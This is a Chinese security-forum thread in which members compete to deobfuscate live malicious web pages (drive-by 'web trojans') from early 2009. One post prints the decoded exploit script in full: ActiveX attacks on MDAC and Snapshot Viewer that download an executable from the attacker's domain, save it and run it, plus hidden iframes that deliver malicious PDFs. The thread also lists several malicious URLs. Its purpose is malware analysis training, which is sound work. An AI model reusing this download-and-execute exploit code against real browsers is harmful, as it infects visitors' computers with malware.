[解密悬赏][第14期][结束~]

qianwenxiang

宗旨：
让更多人了解如何解密网马
规则：
1、Hunter不能参加活动
2、必须把所有木马地址全部解出，不完全解密且所发URL之前没有人解出者得到相应步骤加分
3、最好有解密软件日志，如果没有，请发出具体解密过程
4、当第一个人成功完全解密后，将根据难度给予其相应经验，所有URL全部解完之后本帖将锁定
5、如果有违反1~2条规则的情况，本帖随即锁定，之后成功解密的作废！
6、锁定后，会重新修改本次的解密地址，并且开帖！
7、为了体现悬赏帖宗旨，昨日解密成功者再次解出今天网址的只能得到对应网址70%经验



解密地址（替换HXXP为HTTP）：


hxxp://www.firnop.cn/

(完成情况：完成 by knifed @ 3L ; lichun005 @ 5L)

一次解完（包含解密步骤）=15分
分步（即未解完情况）=每步5分
很夸张的丢我两个PDF就404了。。不知道是不是COOKIES检测。。


hxxp://qqqqkkkss.cn/4/14.htm

(完成情况：完成 by dearhaoji @ 10L)

一次解完，包含解密步骤=6分



注意：这些地址含有恶意软件，可能会危害到您的计算机。请不要直接打开，否则因此造成的一切后果我们概不负责！
参考解密工具：
FreShow（英文）、 Redoce 1.6（中文）、malzilla （英文，但是乃神器也）
http://glacierlk.cn/openlab/jm.htm
参考解密教程：
http://bbs.kafan.cn/viewthread.php?tid=387608
http://bbs.kafan.cn/viewthread.php?tid=220550
http://www.jimmyleo.com/share/FreShow!.rar（推荐！不会用FreShow的可以看看）


(时限=1天)(至2008.01.14 19:00止)

qianwenxiang

如果第一个站打不开的话等下我把他扔给我的两个PDF传上来

knifed

我的两个都打不开

qianwenxiang

ps. 第二个freshow redoce均打不开 但是……

两个PDF

knifed

<script type='text/javascript'>
function goPDF() {
wnd=window;
while (wnd.parent!=wnd)
wnd=wnd.parent;
wnd.location="getfile.php?f=vispdf";
}
try {
if (navigator.plugins) {
  for (var i=0;i<navigator.plugins.length;i++) {
   var name = navigator.plugins.name;
   if (name.indexOf('Adobe Acrobat') != -1) {
    document.write("<iframe src='getfile.php?f=pdf' width=1 height=1 frameborder=0></iframe>");
    setTimeout('goPDF();',4000);
    break;
   }
  }
} else {
  document.write("<iframe src='getfile.php?f=pdf' width=1 height=1 frameborder=0></iframe>");
  setTimeout('goPDF();',4000);
}
} catch (e) {
document.write("<iframe src='getfile.php?f=pdf' width=1 height=1 frameborder=0></iframe>");
setTimeout('goPDF();',4000);
}
</script>
这个是否就是.但下面具体的不太明白.

qianwenxiang

是的 下一步就是PDF解密了

lichun005

---------------------------
Microsoft Internet Explorer
---------------------------

好像也只有pdf后缀可疑吧
88d969c5-f192-11d4-a65f-0040963251e5
06071漏洞？
才接触，不熟悉

<object id=xmltarget classid="CLSID:88d969c5-f192-11d4-a65f-0040963251e5"></object>
<SCRIPT type='text/javascript'>
function errfuck() { return true; }
window.onerror=errfuck;

function dddec(str) {
cto="QHdtR1FKhPGv4VbuDxN0AE3fBgpXmOYIqzyJj5wTWnr2cL8ZilUaCM96So7kse"; cfrom="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890"; res="";
for (i=0;i<str.length;i++) {
  c=str.charAt(i); pos=cto.indexOf(c);
  if (pos!=-1)
   res+=cfrom.charAt(pos);
  else
   res+=c;
}
return res;
}

function goMDAC(){
d8= 0;
  var Qy29Nd = document.createElement(dddec("hfDdER"));
  Qy29Nd.setAttribute("id",dddec("p1MsU4"));
Qy29Nd.setAttribute("classid",dddec("ENvK4:lwsoZSSo-oSj9-CCwe-sk9j-eeZe6TZMsm9o"));
try{
var LoWMFJ = Qy29Nd.CreateObject(dddec("G4h4f.vRtdGg"),'');
var d8 = 1;
}catch(e){}
try{
var PEELt6 = Qy29Nd.CreateObject(dddec("5udNN.jPPNKEGRKhB"),'');
var d8 = 1;
}
catch(e){}
if(d8 == 1)
{
try
{
var JB7Ebp = Qy29Nd.CreateObject(dddec("gvAgNM.8acnYYJ"),'');

  JB7Ebp.open("GET","http://firnop.cn/getexe.php?h=11",false);
  JB7Ebp.send();
  LoWMFJ.type = 1;
  LoWMFJ.open();
LoWMFJ.Write(JB7Ebp.responseBody);
  Frogxa = "..\\S87ekhV.exe";
LoWMFJ.SaveToFile(Frogxa,2);
eval(dddec("JmmcRo.5udNNmAdEFRd(TthbAG);"));
//return 1;
}
catch(e){}
}
}

function goPDF() {
wnd=window;
while (wnd.parent!=wnd)
wnd=wnd.parent;
wnd.location="getfile.php?f=vispdf";
}

function goSnap() {
var sfrom = 'http://firnop.cn/getexe.php?h=12';
var fuckavo="SB";
var x;
var fuckavp="SB";
var obj;
var fuckavx="SB";
var mycars = new Array();
var fuckava="SB";
mycars[0] = "c:/Program Files/Outlook Express/WAB.EXE";
mycars[1] = "d:/Program Files/Outlook Express/WAB.EXE";
mycars[2] = "e:/Program Files/Outlook Express/WAB.EXE";

var objlcx = new ActiveXObject("snpvw.Snapshot Viewer Control.1");

if(objlcx) {

setTimeout('window.location = "ldap://"',3000);

for (x in mycars)
{
obj = new ActiveXObject("snpvw.Snapshot Viewer Control.1")

var buf1 = sfrom;
var fuckavg="SB";
var buf2=mycars[x];
var fuckavj="SB";

obj.Zoom = 0;
obj.ShowNavigationButtons = false;
obj.AllowContextMenu = false;
obj.SnapshotPath = buf1;

try
{
obj.CompressedPath = buf2;
obj.PrintSnapshot();

}catch(e){}

}
}
var fuckavqgga="SB";
var fuckavqggxa="SBd";
}

setTimeout('goMDAC();',3500);
setTimeout('goSnap();',1);

try {
var obj = null;
obj = new ActiveXObject("AcroPDF.PDF");
if (!obj) {
  obj = new ActiveXObject("PDF.PdfCtrl");
}
if (obj) {
  document.write("<iframe src='getfile.php?f=pdf' width=1 height=1 frameborder=0></iframe>");
  setTimeout('goPDF();',5000);
}
} catch(e){
document.write("<iframe src='getfile.php?f=pdf' width=1 height=1 frameborder=0></iframe>");
setTimeout('goPDF();',5000);
}
</script>

[ 本帖最后由 lichun005 于 2009-1-13 22:56 编辑 ]

雨宫优子

有点熟悉这家伙...
以前似乎解过？

qianwenxiang

其实我觉得国外那些网马也在玩生成器 只不过加密手段有点YD而已。。

以前见得多点的那个什么微软什么组件的漏洞，Creative声卡升级程序漏洞，CA在线杀毒漏洞，瑞星在线杀毒漏洞，还有个什么WEB的，带个PDF基本没新的了

现在貌似又从国内毒网COPY 代码。。连var fuckavp="SB"都COPY进去了。。

dearhaoji

第2个htp://pppphhhss.cn/3.exe  。。。小A报this 页面